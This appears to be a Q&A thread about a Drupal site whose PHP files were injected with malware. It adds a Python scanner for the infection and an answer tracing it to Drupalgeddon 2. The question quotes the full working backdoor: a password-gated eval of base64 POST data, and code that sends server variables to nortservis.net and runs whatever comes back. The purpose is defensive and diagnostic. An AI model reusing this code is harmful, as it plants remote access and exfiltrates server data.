
I have someone injecting my php files with the following code:

if(md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d") { 

eval(base64_decode($_POST["cookies_p"])); }
if (strpos($_SERVER['REQUEST_URI'], "post_render" ) !== false) { $patchedfv = "GHKASMVG"; }
if( isset( $_REQUEST['fdgdfgvv'] ) ) { if(md5($_REQUEST['fdgdfgvv']) === "93ad003d7fc57aae938ba483a65ddf6d") { $patchedfv = "SDFDFSDF"; } }

if($patchedfv === "GHKASMVG" ) { @ob_end_clean();  die;  }

if (strpos($_SERVER["HTTP_USER_AGENT"], "Win" ) === false) { $kjdke_c = 1; }
error_reporting(0);
if(!$kjdke_c) { global $kjdke_c; $kjdke_c = 1;
global $include_test; $include_test = 1;
$bkljg=$_SERVER["HTTP_USER_AGENT"];
$ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress". "integromedb","SISTRIX","Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS", "WordPress");
if( !($_GET['df'] === "2") and !($_POST['dl'] === "2" ) and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['condtions'])  or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1")  or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1" )))
{}
else
{
foreach($_SERVER as $ndbv => $cbcd) { $data_nfdh.= "&REM_".$ndbv."='".base64_encode($cbcd)."'";}
$context_jhkb = stream_context_create(
array('http'=>array(
                        'timeout' => '15',
                        'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
                        'method' => 'POST',
                        'content' => "REM_REM='1'".$data_nfdh
)));
$vkfu=file_get_contents("http://nortservis.net/session.php?id", false ,$context_jhkb);
if($vkfu) { @eval($vkfu); } else {ob_start();  if(!@headers_sent()) { @setcookie("condtions","2",time()+172800); } else { echo "<script>document.cookie='condtions=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';</script>"; } ;};
}

}

I blocked the nortservis.net in /etc/hosts. I disabled allow-php-url-fopen. I have fail2ban on the server but it's not catching this. What can I do?

Drifter104
  • If the injection happens when someone is running your PHP scripts, you should fix your scripts. – Jenny D Jun 22 '18 at 13:13
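As an added example (not code from the question or its answers), here is a small scanner that looks for the indicators visible in the injected block above: the hard-coded MD5 password gate, eval of base64-decoded request data, the nortservis.net call-home, the `condtions` cookie marker, and file_get_contents of an http URL. The indicator list and the two sample files are constructed for this example and are not an exhaustive signature set.

```python
import re
import sys
from pathlib import Path

# Indicators taken from the injected code quoted in the question.
# This set is constructed for the example and is not exhaustive.
INDICATORS = {
    "md5_password_gate": re.compile(
        r'md5\(\s*\$_(?:POST|REQUEST|GET)\[[^\]]*\]\s*\)\s*===\s*"93ad003d7fc57aae938ba483a65ddf6d"'),
    "eval_base64_request": re.compile(
        r'eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b'),
    "c2_host_nortservis": re.compile(r'nortservis\.net'),
    "cookie_marker_condtions": re.compile(r'\bcondtions\b'),
    "http_fetch_in_php": re.compile(r'file_get_contents\s*\(\s*"https?://'),
}

def scan_source(src):
    """Return (line_number, indicator_name) pairs for every hit in PHP source text."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((lineno, name))
    return hits

def scan_tree(root, suffixes=(".php", ".inc", ".module", ".theme")):
    """Walk a web root and map each file that has hits to its hit list."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.suffix in suffixes and path.is_file():
            try:
                hits = scan_source(path.read_text(errors="replace"))
            except OSError:
                continue  # unreadable file; skip rather than abort the scan
            if hits:
                report[str(path)] = hits
    return report

# Constructed samples: a few lines of the injected block prepended to an
# otherwise benign file, and a clean file that uses md5/file_get_contents legitimately.
INFECTED_SAMPLE = '''<?php
if(md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d") {
eval(base64_decode($_POST["cookies_p"])); }
$vkfu=file_get_contents("http://nortservis.net/session.php?id", false ,$context_jhkb);
if($vkfu) { @eval($vkfu); } else { @setcookie("condtions","2",time()+172800); }
echo "site";
'''
CLEAN_SAMPLE = '<?php\n$cfg = file_get_contents(__DIR__ . "/settings.php");\necho md5($cfg);\n'

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for fname, hits in scan_tree(root).items():
        for lineno, name in hits:
            print(f"{fname}:{lineno}: {name}")
```

Run it against the web root (e.g. `python scan.py /var/www`); a hit only tells you where to look, so a match on `http_fetch_in_php` alone in a legitimate module still needs a manual read.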

1 Answer


I have experienced the same problem as you a couple of weeks ago: the php files in my server were injected with exactly the same code.

In my case, I found out that my Drupal site was not up to date and was exploited by the vulnerability known as Drupalgeddon 2 (aka SA-CORE-2018-002), which was used to fiddle with my system and inject this php. Given the seriousness of the vulnerability, I wiped out my server and reinstalled it all (lesson learned: keep your system up to date!).

If you have Drupal, verify that your version is up to date and not vulnerable to SA-CORE-2018-002. Exploitation of the vulnerability may appear as a suspicious POST record in your access logs.

wamdebach
  • Yes, it is a drupal website. I will look into the update part. – sebastian.roibu Jun 24 '18 at 18:39
  • Before updating, check your current version (see CHANGELOG.txt in your Drupal root directory). If your version is before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1, then your system is likely compromised and I strongly advise you to wipe out your server and reinstall again. See: https://groups.drupal.org/security/faq-2018-002 – wamdebach Jun 24 '18 at 20:42
  • How would I do that? I am planning to start with a new server, install latest version of drupal and then try to migrate the current website. But: will I copy/migrate the vulnerability? – sebastian.roibu Jun 26 '18 at 05:05
  • I would restore the website from your last backup before the attack happened. Then I would try to restore the missing content from the last backup manually, making sure that I do not copy any compromised content. If you don't have a recent backup, this may be a lot of work, but personally I don't see a better solution. Good luck! – wamdebach Jun 27 '18 at 06:28